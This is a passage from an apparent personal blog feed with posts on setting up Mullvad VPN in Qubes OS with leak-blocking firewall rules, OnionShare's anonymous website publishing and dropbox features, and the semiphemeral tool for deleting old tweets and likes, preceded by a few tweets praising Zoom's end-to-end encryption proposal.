<p><em>Posted 4:25 PM · May 26, 2020, 2 Retweets, 27 Likes</em></p>
<hr>
<p>Overall, I’m very excited about this new proposal. Zoom is taking this stuff seriously and hired good people to make it happen. Honestly it’s way more than I expected. I’m glad journalists looked so deeply into Zoom’s security and privacy. That journalism is having real impact</p>
<p><em>Posted 4:28 PM · May 26, 2020, 13 Retweets, 58 Likes</em></p>
<hr>
<p>Link to paper: <a href="https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf">https://github.com/zoom/zoom-e2e-whitepaper/blob/master/zoom_e2e.pdf</a></p>
<p><em>Posted 4:39 PM · May 26, 2020, 6 Retweets, 26 Likes</em></p>
<hr>
<p>One last thing! Zoom says E2EE will only be available to paid accounts, but I hope they change their mind and make it available to free accounts too -- it's a valuable feature, but <em>everyone</em> deserves privacy, not just rich people and companies</p>
<p><em>Posted 4:48 PM · May 26, 2020, 17 Retweets, 51 Likes</em></p>
Using Mullvad VPN in Qubes2019-11-01T00:00:00ZMicah Leeurn:uuid:fb28f10c-be0d-362d-8adc-c508dbc31a1a<p>A friend wanted my help configuring <a href="https://mullvad.net/en/">Mullvad VPN</a> on their Qubes computer. Instead of just helping them, I decided to write a quick blog post explaining how I normally set up VPNs in Qubes. There are many different ways -- Mullvad even has its own <a href="https://mullvad.net/en/help/qubes-os-4-and-mullvad-vpn/">Qubes guide</a> -- but I prefer using NetworkManager system tray applets, so I can always see if my VPN is connected or not. I also use a simple script that I set to run when my AppVM boots to automatically connect to the VPN, and reconnect if it disconnects, and Qubes firewall rules to prevent non-VPN internet traffic from sneaking by.</p>
<p>First, create a new VM called <code>vpn-mullvad</code>. Use the latest Fedora template you have (<code>fedora-30</code> in my case), and make sure to set networking to <code>sys-firewall</code> and not <code>default (sys-firewall)</code>. Finally, check both the "provides network" and "launch settings after creation" boxes. ("Provides network" means this new VM will be able to provide internet access to other VMs.)</p>
<p><img src="qubes-mullvad-create.png" alt=""></p>
<p>When the <code>vpn-mullvad</code> settings open, switch to the "Services" tab and add a service called <code>network-manager</code>, and click ok. This will make it so that when this VM boots up, you'll have a NetworkManager system tray applet in the top-right corner of your screen.</p>
<p><img src="qubes-mullvad-services.png" alt=""></p>
<p>Now, open a web browser in a disposable VM (click the Qubes menu, then <code>Disposable: fedora-30-dvm</code>, <code>fedora-30-dvm: Firefox</code>), and <a href="https://mullvad.net/en/account/login/">login</a> to your Mullvad account at mullvad.net. Once you're logged in, go to Mullvad's <a href="https://mullvad.net/en/download/config/">OpenVPN configuration file generator</a>. Set your platform to <code>Linux</code>, choose a location, and make sure to check <code>Use IP addresses</code>. Then click download. (In my case, since I'm setting up this VPN to go to Canada, I'm downloading the file <code>mullvad_config_linux_ca.zip</code>.)</p>
<p><img src="qubes-mullvad-openvpn-config-generator.png" alt=""></p>
<p>Now open a file manager in your disposable VM that contains the file you just downloaded.</p>
<p><img src="qubes-mullvad-open-folder.png" alt=""></p>
<p>And copy it to your <code>vpn-mullvad</code> VM. (This will probably boot that VM for the first time.)</p>
<p><img src="qubes-mullvad-copy1.png" alt="">
<img src="qubes-mullvad-copy2.png" alt=""></p>
<p>Now open a file manager in your <code>vpn-mullvad</code> VM (click the Qubes menu, <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Files</code>). Navigate to the <code>QubesIncoming</code> folder, then the folder inside it named after your disposable VM (in my case, <code>disp9309</code>). You should see the zip file with the Mullvad OpenVPN config. Right-click on it and choose "Extract Here". Then drag the extracted folder (<code>mullvad_config_linux_ca</code>, in my case) to <code>Documents</code>. Then, navigate inside this folder, and you should see your VPN config files.</p>
<p><img src="qubes-mullvad-files.png" alt=""></p>
<p>Also, you might notice that when your <code>vpn-mullvad</code> VM booted up, there is a new NetworkManager applet in your system tray. Click on it, go to <code>VPN Connections</code>, <code>Add a VPN connection...</code>.</p>
<p><img src="qubes-mullvad-systray.png" alt=""></p>
<p>Then choose <code>Import a saved VPN configuration...</code> from the dropdown list, and click Create.</p>
<p><img src="qubes-mullvad-import-vpn1.png" alt=""></p>
<p>Then browse for the Mullvad <code>.conf</code> file in your <code>Documents</code> folder.</p>
<p>Back in your file manager, double click on <code>mullvad_userpass.txt</code> -- this will show you what to put into the username and password fields.</p>
<p><img src="qubes-mullvad-import-vpn2.png" alt=""></p>
<p>Then click save. This will pop up a window asking you to choose a password for the default keyring -- you can just leave it blank and click continue, and click continue again to confirm you want to store passwords unencrypted. (Everything on your computer is actually encrypted with full disk encryption, and you won't be running any other software in this VM that could access these files.)</p>
<p><img src="qubes-mullvad-keyring-password.png" alt=""></p>
<p>Now you should be able to click the <code>vpn-mullvad</code> NetworkManager system tray icon, click <code>VPN Connections</code>, and connect to the new VPN you just added. It should attempt to connect, and if all goes well you should see a notification that says, "VPN connection has been successfully established," and the NetworkManager icon should have a little lock next to it.</p>
<p><img src="qubes-mullvad-connect.png" alt=""></p>
<p>Now, let's make this VPN automatically connect whenever it boots up. Open a terminal in <code>vpn-mullvad</code> (click Qubes, <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Terminal</code>), and run:</p>
<pre><code>sudo gedit /rw/config/autovpn.sh
</code></pre>
<p>This will open up a blank file using gedit (feel free to use whatever text editor you prefer). Copy and paste this script into it. You may need to change the line that says <code>nmcli con up mullvad_ca</code> to use the name of the VPN config that you added, assuming you chose a location other than Canada.</p>
<pre><code>#!/bin/bash
# Loop forever: reconnect the VPN whenever it drops
while true; do
    if nmcli con | grep -Fq tun0; then
        # tun0 is up, so the VPN is connected
        echo "Already connected, sleeping 5"
        sleep 5
    else
        echo "Connecting"
        nmcli con up mullvad_ca
    fi
done
</code></pre>
<p>Then save this file and quit the editor. This script basically checks to see if you're connected to the VPN. If you are, it waits 5 seconds and checks again. If you're not, it connects you to the VPN. And it loops forever -- so that if you ever get disconnected, it will detect this and automatically reconnect.</p>
<p>Back in your terminal, make it executable:</p>
<pre><code>sudo chmod +x /rw/config/autovpn.sh
</code></pre>
<p>And now edit your <code>rc.local</code> file:</p>
<pre><code>sudo gedit /rw/config/rc.local
</code></pre>
<p>Add <code>sudo -u user /rw/config/autovpn.sh &</code> to the end of this file, and save and exit.</p>
<p><img src="qubes-mullvad-rclocal.png" alt=""></p>
<p>The <code>rc.local</code> script, which gets run every time the VM boots up, will now run the <code>autovpn.sh</code> script in the background.</p>
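<p>For reference, the finished <code>rc.local</code> might look something like this (illustrative; any lines already present in yours should stay above the new one):</p>

```shell
#!/bin/sh
# /rw/config/rc.local -- Qubes runs this every time the VM boots.
# ...any existing lines stay here...

# Start the VPN auto-connect loop in the background, as the unprivileged user
sudo -u user /rw/config/autovpn.sh &
```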
<p>Go ahead and try it out! Power off the <code>vpn-mullvad</code> VM (click the Qubes logo in the system tray, then <code>vpn-mullvad</code>, <code>Shutdown</code>), and then power it on again (you can open the file manager in that VM again). The VPN should automatically connect.</p>
<p>Now, let's prevent some leaks. It's common for programs on your computer to try to do stuff on the internet while your VPN isn't connected -- maybe it hasn't connected yet, or it got disconnected for some reason. We can use Qubes firewall rules to prevent the <code>vpn-mullvad</code> VM from communicating with anything except for the VPN servers that it's configured to connect to, so if (for example) your VPN gets disconnected but you have a web browser open, your browser won't load anything from your real IP address -- that traffic will get dropped by the firewall.</p>
<p>In a file manager in <code>vpn-mullvad</code>, go to the folder that contains your Mullvad OpenVPN config files, and open the <code>.conf</code> file. You'll see a list of lines that start with <code>remote</code> -- these are the various OpenVPN servers that Mullvad is configured to try connecting to. (In my case, these are in Montreal, Toronto, and Vancouver.)</p>
<p><img src="qubes-mullvad-remotes.png" alt=""></p>
<p>Now open the settings for <code>vpn-mullvad</code> (click the Qubes menu, go to <code>Service: vpn-mullvad</code>, <code>vpn-mullvad: Qubes Settings</code>) and switch to the "Firewall rules" tab. You can add a new rule to allow each of these IP addresses through, blocking all other IPs.</p>
<p>But before we do, a quick note about Qubes firewall rules. For some reason, Qubes seems to choke if you have too many of them (more than maybe 20). So for example, if you set up Mullvad to choose servers in the US, then there will be way too many servers in the list. So, before proceeding, delete some of them from this file to bring it down to a more manageable number of servers. If you do this, make sure to delete your VPN in NetworkManager and then add it again.</p>
<p>And also a quick note on copy and paste. There's no easy way to copy something from a VM and then paste it into <code>dom0</code>. There are good security reasons for this, but it makes this work tedious. So if you want to copy and paste, you can actually just view this file directly from <code>dom0</code>. Open a terminal in <code>dom0</code> (click the Qubes menu, and open <code>Terminal Emulator</code>). Then run this:</p>
<pre><code>qvm-run --pass-io vpn-mullvad 'cat ~/Documents/mullvad_*/*.conf' | grep "remote "
</code></pre>
<p>This will show you all of the <code>remote</code> lines from your OpenVPN config file, but inside your <code>dom0</code> terminal, and you <em>can</em> copy from this window to paste into the Qubes firewall rules.</p>
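<p>If you only want the addresses themselves, the same idea works with a small <code>awk</code> filter. Here's a sketch against a throwaway sample config (the IPs below are placeholders, not real Mullvad servers) that pulls out just the second field of each <code>remote</code> line:</p>

```shell
# Create a tiny sample OpenVPN config (hypothetical IPs, for illustration)
cat > /tmp/sample.conf <<'EOF'
client
proto udp
remote 198.51.100.10 1300
remote 198.51.100.11 1300
EOF

# Print just the server IPs (second field of each "remote" line)
awk '/^remote /{print $2}' /tmp/sample.conf
```

You could pipe the <code>qvm-run</code> command above through the same <code>awk</code> filter instead of <code>grep</code> to get a bare list of IPs to paste into the firewall rules.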
<p><img src="qubes-mullvad-remotes-dom0.png" alt=""></p>
<p>Now, back in the <code>vpn-mullvad</code> settings window, in the firewall rules tab, select "Limit outgoing Internet connections to ...". Then click the plus button, and add a rule for each IP address, copying and pasting from the <code>dom0</code> terminal if you'd like. It's fine to set the protocol to "Any" for each rule.</p>
<p><img src="qubes-mullvad-firewall.png" alt=""></p>
<p>When you click ok, you're done setting up <code>vpn-mullvad</code>! It uses the NetworkManager applet, it automatically connects if it gets disconnected, and thanks to the firewall rules, as long as you set <code>vpn-mullvad</code> as your networking VM, none of your downstream VMs will make any internet connections that don't go through the VPN you just set up.</p>
<p>If you want all of your VMs to use Mullvad by default, open Qubes Global Settings (Qubes menu, <code>System Tools</code>, <code>Qubes Global Settings</code>) and change "Default netVM" from <code>sys-firewall</code> to <code>vpn-mullvad</code> and click ok.</p>
<p>And finally, you may want the ability to open a browser window while not using a VPN -- like, if you connect to a public wifi network and need to click through a captive portal. I solve this problem by making a disposable VM template specifically for this purpose.</p>
<p>Open the settings for <code>fedora-30-dvm</code> (Qubes menu, <code>Disposable: fedora-30-dvm</code>, <code>fedora-30-dvm: Qube Settings</code>) and click "Clone qube" -- rename this clone to <code>fedora-30-clearnet-dvm</code>. Now open the settings for <code>fedora-30-clearnet-dvm</code>, and change "Networking" from <code>default (vpn-mullvad)</code> to <code>sys-firewall</code>, and click ok.</p>
<p>Now, if you need to click through a captive portal, you can just open a browser in a <code>fedora-30-clearnet-dvm</code> disposable VM to click through it, and as soon as you have internet <code>vpn-mullvad</code> will automatically connect to Mullvad, and internet will start working in the rest of your VMs.</p>
<p><img src="qubes-mullvad-connected.png" alt=""></p>
New version of OnionShare makes it easy for anyone to publish anonymous, uncensorable websites2019-10-13T00:00:00ZMicah Leeurn:uuid:e9532b32-0312-3315-94f2-09766d927c89<p>I’m excited to announce that OnionShare 2.2 is released! You can download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>When I first wrote OnionShare in 2014, it let you anonymously and securely send files to people. It worked like this: OnionShare zips up the files, starts a local web server on your computer with a link to this zip file, makes this website accessible as a Tor onion service, and shows you the URL of the web server. You send someone this .onion URL, they load it in Tor Browser (loading the website hosted directly on your computer), and then they can download the zip file. As soon as the download is complete, OnionShare shuts down the web service.</p>
<p>In the years since then it has gotten a whole lot better (largely thanks to a <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">growing community</a> of volunteer contributors). Instead of just sending files, you can use it to receive files now, allowing you to turn your computer into an <a href="https://micahflee.com/2019/02/onionshare-2/">anonymous dropbox</a>. But it has always worked the same way: hosting an anonymous website locally on your computer. But since OnionShare hosts a website on your computer anyway, why not use it to <em>host actual websites</em>?</p>
<p><img src="onionshare-website-mode.png" alt=""></p>
<p>In addition to the “Share Files” and “Receive Files” tabs, OnionShare 2.2 introduces the “Publish Website” tab. You drag all of the files that make up your website into the OnionShare window and click “Start sharing.” It will start a web server to host your static website and give you a .onion URL. This website is only accessible from the Tor network, so people will need Tor Browser to visit it. People who visit your website will have no idea who you are – they won’t have access to your IP address, and they won’t know your identity or your location. And, so long as your website visitors are able to access the Tor network, the website can’t be censored.</p>
<p>Here are some things to keep in mind about how website publishing in OnionShare works:</p>
<p>If any folder in the website that you’re sharing includes an <code>index.html</code> file, then when someone loads that folder in Tor Browser it will load that html file. If any folder doesn’t include an <code>index.html</code> file, it will show a directory listing instead. So you could, for example, publish a website that’s just a bunch of files without any html, and people who load it in Tor Browser will be able to browse your files and folders and download individual files.</p>
<p><img src="onionshare-directory-listing.png" alt=""></p>
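<p>To make that concrete, here's a minimal sketch of a folder you could drag into the "Publish Website" tab (the folder and file names are just an example):</p>

```shell
# A minimal static site: the top level has an index.html, a subfolder doesn't
mkdir -p mysite/files
cat > mysite/index.html <<'EOF'
<!DOCTYPE html>
<html><body><h1>Hello from an onion service</h1></body></html>
EOF
cp mysite/index.html mysite/files/page.html

# Visiting / would render index.html; visiting /files/ would show a
# directory listing, since that folder has no index.html of its own.
```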
<p>When sharing something that’s not public, OnionShare now uses HTTP basic authentication. So the URLs that you share look like <code>http://onionshare:[password]@[address].onion</code> now. When someone loads the URL in Tor Browser, it will ask them if they want to login first, like this:</p>
<p><img src="onionshare-basic-auth.png" alt=""></p>
<p>When they click OK, the URL in the address bar no longer contains the <code>onionshare:[password]</code> part, and just looks like a normal website. (This protects against shoulder surfing, where an attacker looks at someone’s screen to see the OnionShare URL and visit it themselves.)</p>
<p><img src="onionshare-basic-auth-loaded.png" alt=""></p>
<p>If you want to publish your website for anyone to see, you can always go to settings and enable “public mode”, which simply doesn’t use a username and password anymore.</p>
<p>If you want to use OnionShare to publish a website that you intend to remain online for a long time, it’s important to remember that your computer itself is literally the web server. If you turn off your computer, or even just suspend your laptop, the website will go down. To prevent this, you’ll have to use a computer that’s always turned on for this. You’ll also probably want to go into settings and check “Use a persistent address” – this means that if you close OnionShare and re-open it again (for example, if you have to install updates on the computer and reboot it), the URL will stay the same the next time you start the server. If you don’t use a persistent address, every URL is temporary, and there’s no way to re-use an old URL.</p>
<p>Another thing that’s new is that OnionShare will now show you exactly what web requests people are making to your website (you get to see this when sharing and receiving files too, not just for publishing websites). For example, here’s a website hosted by OnionShare getting scanned with the <a href="https://cirt.net/nikto2">nikto</a> web vulnerability scanner.</p>
<p><img src="onionshare-nikto.png" alt=""></p>
<p>And finally, since we put in all of the work to make it so you can browse through directory listings when publishing a website, we also made it so you can similarly browse through folders that are being shared when just sharing files, so people can see exactly what files they’re about to download before downloading them.</p>
<p><img src="onionshare-share-directory-listing.png" alt=""></p>
<p>And if you go into settings and uncheck “Stop sharing after files have been sent” (this is the setting that makes the server shutdown after the first person downloads the files you’re sharing), then people will also be able to download individual files that you’re sharing, instead of only having the option to download everything at once.</p>
<p>I hope you enjoy the new OnionShare!</p>
With Semiphemeral you can delete your old Twitter likes, but it's noisy2019-07-21T00:00:00ZMicah Leeurn:uuid:afe34804-17a8-39c7-8e79-9d366866bdd8<p>I don't know if others use Twitter the same way that I do, but I tend to like things quite a bit more frequently than I tweet or retweet things. I'd imagine that if you analyzed my last 10 years of Twitter likes, you could learn much more about me than just by looking at my timeline. My likes probably reveal exactly which political, technical, and social arguments I followed, and which sides I took in all of them.</p>
<p>I recently programmed a tool called <a href="https://micahflee.com/2019/06/semiphemeral-automatically-delete-your-old-tweets-except-for-the-ones-you-want-to-keep/">semiphemeral</a> to automate deleting all of my old tweets (except for ones that I want to keep), and it also goes back and unlikes all of the tweets that I liked more than 60 days ago -- or so I initially thought. It soon became clear that semiphemeral only actually deleted the most recent 4,000 likes.</p>
<p>I just released a new version that allows you to delete <em>all</em> of your old likes, but unfortunately there are some... caveats. (You can install semiphemeral with <code>pip3 install semiphemeral</code>, and if you already have it installed you can upgrade to the latest version with <code>pip3 install --upgrade semiphemeral</code>.)</p>
<p>Twitter works in mysterious ways. If you have a very long like history, the only way to delete your old ones is to first <em>relike</em> those tweets (yes, the tweets that you already liked), and <em>then</em> you can unlike them. This means that your friends (and strangers) will get notifications that you, for example, liked a random tweet from 2014, but by the time they open Twitter the notification will be gone, and you won't be listed in their likes for that tweet. And on top of that, running this script may take <em>weeks</em>. Twitter only allows you to like up to 1,000 tweets per day, so if you need to relike/unlike about 10,000 tweets (this is what I did), it will take about 10 days to run. I had maybe a dozen different people contact me wondering if my account was hacked.</p>
<p><img src="twitter-deleting-likes.png" alt=""></p>
<p>But why?</p>
<p>It turns out that the Twitter <a href="https://developer.twitter.com/en/docs/tweets/post-and-engage/api-reference/get-favorites-list.html">API call</a> for getting a list of tweets that a user has liked, <code>GET favorites/list</code>, doesn't work as you'd expect. It only returns the most recent 4,000 likes -- and even if you delete those and wait several days, it never returns any that are older than those. In fact, there doesn't seem to be any way at all to get the API to give you a complete list of IDs for old tweets that you liked.</p>
<p>In order to get a list of all of your old likes (since the Twitter API won't give it to you), you must go to <a href="https://twitter.com/settings/your_twitter_data">https://twitter.com/settings/your_twitter_data</a> and download your Twitter data (note that this is different from your "Twitter archive", which doesn't include information about your likes). Twitter will email you a link to a zip file. When you unzip it there will be many files, including a file called <code>like.js</code>. Run this command, with the path to your <code>like.js</code>, for example:</p>
<pre><code>semiphemeral unlike --filename ~/path/to/like.js
</code></pre>
<p>Using the <code>like.js</code> file from your Twitter data, this will first fetch all of the tweets that you liked, then it will relike and unlike each one of them. Each relike will trigger a notification, but at the end of the process your likes will have actually been deleted.</p>
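<p>For the curious, the <code>like.js</code> file in the export is a JavaScript assignment wrapping a JSON array. A minimal sketch of pulling the tweet IDs out of it might look like this (the exact field names, like <code>tweetId</code>, are based on Twitter's export format and could change; this is an illustration, not semiphemeral's actual parser):</p>

```python
import json

def parse_like_js(raw):
    """Extract tweet IDs from a Twitter data export's like.js file.

    The file is a JavaScript assignment wrapping a JSON array, roughly:
        window.YTD.like.part0 = [ {"like": {"tweetId": "...", ...}}, ... ]
    so strip everything before the first '[' and parse the rest as JSON.
    """
    entries = json.loads(raw[raw.index("["):])
    return [entry["like"]["tweetId"] for entry in entries]
```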
<p>Each time it hits the 1,000 likes/day rate limit, semiphemeral will pause for 24 hours before continuing (if the command crashes or you cancel in the middle for any reason, it's safe to run it again to continue where you left off). If possible, I recommend you run this in a <code>screen</code> or <code>tmux</code> session on a server somewhere so that it doesn't get interrupted when you suspend your laptop. And if you're running semiphemeral on a cron job, I recommend that you disable it first, and then start it up again when it's finished.</p>
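<p>The pacing described above boils down to a simple loop. Here's a sketch with the Twitter API calls stubbed out as injected callables (<code>like</code> and <code>unlike</code> are hypothetical stand-ins, not semiphemeral's actual internals), which also makes the logic easy to exercise without the network:</p>

```python
import time

def relike_and_unlike(tweet_ids, like, unlike, daily_limit=1000, sleep=time.sleep):
    """Relike then unlike each tweet, pausing 24 hours whenever the
    daily like limit is hit. `like` and `unlike` are injected callables
    standing in for the real Twitter API calls."""
    likes_used = 0
    for tweet_id in tweet_ids:
        if likes_used and likes_used % daily_limit == 0:
            sleep(24 * 60 * 60)  # wait out the likes-per-day rate limit
        like(tweet_id)    # relike (required before Twitter lets you unlike)
        unlike(tweet_id)
        likes_used += 1
```

With 10,000 tweet IDs and a limit of 1,000 likes per day, this loop sleeps nine times, which matches the roughly 10-day runtime described above.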
<p>New likes don't have this problem, so as long as you regularly run <code>semiphemeral delete</code>, your new likes will automatically get deleted.</p>
<p>You can find the source code and readme for semiphemeral on its <a href="https://github.com/micahflee/semiphemeral">GitHub project page</a>.</p>
Semiphemeral: Automatically delete your old tweets, except for the ones you want to keep2019-06-05T00:00:00ZMicah Leeurn:uuid:08bcf639-73b0-3030-9658-24dc8fefffc1<p>In the almost 10 years that I've been using Twitter, I tweeted about 13,700 times, retweeted about 9,000 tweets, and liked (or "favorited", as we called liking back in the day) about 14,000 tweets. I decided to delete most of them using a tool I just finished programming called <a href="https://github.com/micahflee/semiphemeral">semiphemeral</a>. Here is why, and how.</p>
<p>A lot of my classic tweets were... let's just say not exactly the highest quality.</p>
<p><img src="tweet-coffee-pants.png" alt=""></p>
<p>But more than just low quality, I simply don't see many benefits to having a decade-long timeline that anyone who wishes to stalk me can easily access and use against me. For example, in response to me criticizing WikiLeaks, a troll searched my Twitter history for the word "jew", dug up this 2011 tweet about me attending a Jewish wedding, and tweeted it to me with some nonsense about my "tribe".</p>
<p><img src="tweet-jewish-wedding.png" alt=""></p>
<p>And finally, in addition to mediocre tweets and the potential for harassment, I'm sure I've had some bad takes over the years.</p>
<p>I care deeply about privacy. My default search engine is DuckDuckGo. At the moment, I carry an Android phone that doesn't have any Google apps on it. I host my email <a href="https://theintercept.com/2019/04/30/helm-email-server/">from my house</a>. When I text with people on Signal I always set disappearing messages to one week, no matter the conversation. So... why should my social media posts be on the internet forever?</p>
<p>There are plenty of apps that make your tweets "ephemeral", where you can tweet like normal but everything older than, say, a month gets automatically deleted. I also found plenty of simple scripts on GitHub that do this, for those who don't want to give a third party access to their Twitter account.</p>
<p>I looked into a few options but realized none of them would work for me because I don't actually want to delete <em>all</em> of my old tweets. Some of them I'm quite proud of. Like <a href="https://theintercept.com/2014/10/28/smuggling-snowden-secrets/">that time</a> I secretly <a href="https://twitter.com/micahflee/status/296119710485979136">tweeted</a> the PGP fingerprint for Laura Poitras, at the request of Edward Snowden in the early stages of his whistleblowing, so he could be more confident that his communications with her weren't getting man-in-the-middled.</p>
<p><img src="tweet-fingerprint.png" alt=""></p>
<p>I've also written several Twitter threads that I like and don't want to delete, and that even get cited by others. I wrote a massive thread full of the <a href="https://twitter.com/micahflee/status/963852295271104512">sick misogynist details</a> from leaked internal WikiLeaks DMs; a short thread about the time police broke into Chelsea Manning's house <a href="https://twitter.com/micahflee/status/1004006878446153728">with guns drawn</a> for a "wellness check"; a thread detailing everything that is publicly known about <a href="https://twitter.com/micahflee/status/1088511697550172160">supply chain attacks</a>; a thread about a 2-year-long <a href="https://twitter.com/micahflee/status/990265575711617030">honeypot laptop</a> project I did to try to detect evil maid attacks; among many others. And there are other tweets I don't want to delete too -- I don't mean to brag but occasionally I say something incredibly clever. And there's the <a href="https://twitter.com/micahflee/status/908390382882373632">tweet</a> that cryptographically proves that the person who controls my Keybase account also controls my Twitter account.</p>
<p>I realized that I didn't want ephemeral tweets, I wanted <em>semiphemeral</em> tweets. I want to automatically delete my old tweets except for those that meet specific criteria: if a tweet exceeds a specific threshold of retweets or likes, keep it. Also keep any other tweets that are part of a thread that includes a tweet I'm preserving -- I don't want to only keep the first tweet that passes the retweet/like threshold but then delete all the replies, or otherwise lose context. And of course, I wanted a way to tag specific tweets for exclusion from deletion.</p>
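<p>Those rules amount to two passes: first find every thread containing a tweet worth keeping, then keep every tweet in those threads. A rough sketch of the logic, with a simplified tweet representation (this is an illustration of the rules described above, not semiphemeral's actual code):</p>

```python
def tweets_to_keep(tweets, min_retweets, min_likes, manual_excludes):
    """Return the ids of tweets to preserve.

    Each tweet is a dict with 'id', 'thread' (an identifier shared by
    all tweets in the same thread), 'retweets', and 'likes'. Pass 1
    finds every thread containing a tweet that passes a threshold or is
    manually excluded; pass 2 keeps all tweets in those threads, so a
    preserved tweet never loses its surrounding replies or context.
    """
    kept_threads = set()
    for t in tweets:
        if (t["retweets"] >= min_retweets or t["likes"] >= min_likes
                or t["id"] in manual_excludes):
            kept_threads.add(t["thread"])
    return {t["id"] for t in tweets if t["thread"] in kept_threads}
```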
<p>So, I programmed semiphemeral to do just that. <a href="https://github.com/micahflee/semiphemeral">The code</a> is MIT-licensed and written in Python. Everyone is welcome to use it, but you'll need some tech skills to do so. It's a command line tool, not a service. And to use it, you need to generate Twitter API credentials with your Twitter account (roughly following <a href="https://python-twitter.readthedocs.io/en/latest/getting_started.html">these instructions</a>) -- this means you'll be interfacing with the Twitter API directly, rather than giving some third party permission to access your Twitter account. It will work fine to run on your laptop, but if you want to make it automatically delete old tweets going forward, you'll probably want to schedule it to run on a daily cron job on a server somewhere.</p>
<p>You can install it with pip:</p>
<pre><code>$ pip3 install semiphemeral
</code></pre>
<p>Here's how to use it:</p>
<pre><code>$ semiphemeral
Usage: semiphemeral [OPTIONS] COMMAND [ARGS]...

  Automatically delete your old tweets, except for the ones you want to keep

Options:
  --help  Show this message and exit.

Commands:
  configure  Start the web server to configure semiphemeral
  delete     Delete tweets that aren't automatically or manually excluded
  fetch      Download all tweets
  stats      Show stats about tweets in the database
</code></pre>
<p>When you run <code>semiphemeral configure</code>, a local web app starts (powered by <a href="http://flask.pocoo.org/">flask</a>), which you load in a web browser. From here you can configure semiphemeral with both your Twitter API credentials and the settings you want to use -- how old tweets should be before they get automatically deleted, what the retweet and like thresholds should be, as well as when to automatically unretweet and unlike old tweets.</p>
<p>Here's what the settings web page looks like:</p>
<p><img src="semiphemeral-settings.png" alt=""></p>
<p>This web app also has an interface that lets you view all tweets that are staged for deletion a page at a time, filter the text of the tweets for words and phrases to quickly find specific ones, and manually exclude any tweets you choose from deletion.</p>
<p>After configuring your API creds, you must download your entire timeline from Twitter by running <code>semiphemeral fetch</code>. This may take a very long time the first time if you have a lot of tweets. Semiphemeral will automatically pause, sometimes for up to 15 minutes at a time, when it hits the Twitter API's rate limit (all the Twitter API code is powered by <a href="https://tweepy.readthedocs.io/en/latest/">tweepy</a>). It saves your entire history of tweets, as well as all the tweets from threads you've interacted with, in a SQLite database; the database code is powered by <a href="https://www.sqlalchemy.org/">SQLAlchemy</a>.</p>
<p>(Side note: Did you know that Twitter "threads" are actually trees, from a data structure perspective? If a tweet is not replying to any other tweet, it's the root of the tree. It can have an arbitrary number of replies, and each of those replies can have an arbitrary number of replies of their own, which are the branches. If I replied to someone but their account has since been suspended or they deleted the tweet I replied to, my tweet is an orphan, and there's no easy way to determine what the root of its thread actually was.)</p>
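<p>Finding a thread's root, then, means walking up the reply chain until you hit a tweet with no parent, and giving up if a parent is missing. A small sketch of that walk, using a hypothetical <code>parents</code> map rather than semiphemeral's actual data model:</p>

```python
def thread_root(tweet_id, parents):
    """Walk up the reply chain to the root of a tweet's thread.

    `parents` maps tweet id -> the id it replies to (None for a root).
    If a parent id is missing from the map entirely (the tweet was
    deleted or the account suspended), the tweet is an orphan and the
    true root can't be recovered, so return None.
    """
    current = tweet_id
    while parents.get(current) is not None:
        parent = parents[current]
        if parent not in parents:
            return None  # orphan: the parent tweet is gone
        current = parent
    return current
```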
<p>And finally, after you're sure you've configured the settings you want and have sifted through all your old tweets and manually excluded any specific tweets from deletion, you may want to <a href="https://help.twitter.com/en/managing-your-account/how-to-download-your-twitter-archive">download your Twitter archive</a> for safekeeping. Then, run <code>semiphemeral delete</code> to delete all of your old tweets, except for the ones you want to keep. This, too, might take a long time the first run. It's designed so that you can put <code>semiphemeral delete</code> in a daily cron job, to continue deleting old tweets going forward.</p>
<p>At the moment tweepy has <a href="https://github.com/tweepy/tweepy/issues/1081">a bug</a> that prevents the direct message API from working. But once that's fixed (or maybe before, if I have time and am feeling adventurous) I plan on adding a feature to also automatically delete all old direct messages.</p>
<p>Settings are stored in <code>~/.semiphemeral/settings.json</code>. All tweets (including exceptions, and deleted tweets) are stored in a sqlite database <code>~/.semiphemeral/tweets.db</code>.</p>
<p>Now that I've deleted about 90% of my tweets, and all retweets that are newer than the past month, I feel like my Twitter account is in a much cleaner state than it was before, and there's so much less historical information about my daily likes and politics available to anyone who chooses to look than there used to be. I think I'm going to enjoy semiphemeral tweeting.</p>
<pre><code>$ semiphemeral stats
semiphemeral 0.1
Statistics
{
  "is_configured": true,
  "last_fetch": "2019-06-05 07:39AM",
  "my_tweets": 1353,
  "my_retweets": 127,
  "my_likes": 3987,
  "deleted_tweets": 12005,
  "deleted_retweets": 8917,
  "unliked_tweets": 2365,
  "excluded_tweets": 192,
  "other_tweets": 9537,
  "threads": 3949
}
</code></pre>
OnionShare 2 adds anonymous dropboxes, supports new Tor addresses, and is translated into a dozen new languages2019-02-18T00:00:00ZMicah Leeurn:uuid:45f91085-ec3d-3eae-aa95-ef20090a514b<p>After nearly a year of work from a <a href="https://github.com/micahflee/onionshare/wiki/Developing-OnionShare">growing community</a> of developers, designers, and translators, I'm excited that OnionShare 2 is finally ready. You can download it from <a href="https://onionshare.org/">onionshare.org</a>.</p>
<p>OnionShare is an open source tool for securely and anonymously sending and receiving files using Tor onion services. It works by starting a web server directly on your computer and making it accessible as an unguessable Tor web address that others can load in <a href="https://www.torproject.org/">Tor Browser</a> to download files from you, or upload files to you. It doesn't require setting up a separate server, using a third party file-sharing service, or even logging into an account.</p>
<p>Unlike services like email, Google Drive, Dropbox, WeTransfer, or nearly any other way people typically send files to each other, when you use OnionShare you don't give any companies access to the files that you're sharing. So long as you share the unguessable web address in a secure way (like pasting it in an encrypted messaging app), <em>no one</em> but you and the person you're sharing with can access your files.</p>
<p>Here's a tour of some of the new parts of OnionShare 2.</p>
<ul>
<li><a href="#sharing-files-with-onionshare">Sharing files with OnionShare</a></li>
<li><a href="#the-macos-sandbox">The macOS sandbox</a></li>
<li><a href="#next-generation-onion-services">Next generation onion services</a></li>
<li><a href="#onionshare-doesn-t-zip-if-you-share-just-one-file">OnionShare doesn't zip if you share just one file</a></li>
<li><a href="#onionshare-addresses-are-ephemeral-by-default">OnionShare addresses are ephemeral by default</a></li>
<li><a href="#receiving-files-with-onionshare">Receiving files with OnionShare</a></li>
<li><a href="#only-open-things-from-people-you-trust-or-if-you-know-what-you-are-doing">Only open things from people you trust, or if you know what you are doing</a></li>
<li><a href="#public-onionshare-addresses">Public OnionShare addresses</a></li>
